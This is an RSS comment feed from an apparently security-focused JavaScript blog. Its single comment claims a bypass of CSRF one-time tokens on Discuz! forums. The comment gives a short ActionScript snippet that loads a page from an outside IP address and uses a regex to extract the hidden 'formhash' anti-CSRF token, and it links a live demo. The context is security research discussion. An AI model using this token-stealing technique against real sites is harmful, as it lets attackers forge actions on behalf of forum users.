<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: CSK update</title>
	<atom:link href="http://www.thespanner.co.uk/2007/11/19/csk-update-2/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.thespanner.co.uk/2007/11/19/csk-update-2/</link>
	<description>Javascript blog with messed up syntax inside</description>
	<lastBuildDate>Thu, 26 Jan 2012 01:38:34 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	
	<item>
		<title>By: Iehrepus</title>
		<link>http://www.thespanner.co.uk/2007/11/19/csk-update-2/#comment-873</link>
		<dc:creator>Iehrepus</dc:creator>
		<pubDate>Tue, 20 Nov 2007 14:35:51 +0000</pubDate>
		<guid isPermaLink="false">http://www.thespanner.co.uk/2007/11/19/csk-update-2/#comment-873</guid>
		<description>I had pass [Preventing CSRF:One-Time Tokens] by as, like this i get forumhash in Discuz! bbs:

import RegExp;
url=&#039;http://60.190.243.111/superhei/ieav/flash/&#039;;
var xml:XML = new XML();

xml.onData = function(s) {

	tb1.text = getFirstMatch(new RegExp(&quot;&lt;input type=\&quot;hidden\&quot; name=\&quot;formhash\&quot; id=\&quot;formhash\&quot; value=\&quot;(\\w+)\&quot;&gt;&quot;, &quot;ig&quot;), s, 1);
}

xml.load(url+&quot;post.htm&quot;);

Demo:http://60.190.243.111/superhei/ieav/flash/cd1.html</description>
		<content:encoded><![CDATA[<p>I had pass [Preventing CSRF:One-Time Tokens] by as, like this i get forumhash in Discuz! bbs:</p>
<p>import RegExp;<br />
url=&#8217;http://60.190.243.111/superhei/ieav/flash/&#8217;;<br />
var xml:XML = new XML();</p>
<p>xml.onData = function(s) {</p>
<p>	tb1.text = getFirstMatch(new RegExp(&#8220;&lt;input type=\&#8221;hidden\&#8221; name=\&#8221;formhash\&#8221; id=\&#8221;formhash\&#8221; value=\&#8221;(\\w+)\&#8221;&gt;&#8221;, &#8220;ig&#8221;), s, 1);<br />
}</p>
<p>xml.load(url+&#8221;post.htm&#8221;);</p>
<p>Demo:<a href="http://60.190.243.111/superhei/ieav/flash/cd1.html" rel="nofollow">http://60.190.243.111/superhei/ieav/flash/cd1.html</a></p>
]]></content:encoded>
	</item>
</channel>
</rss>

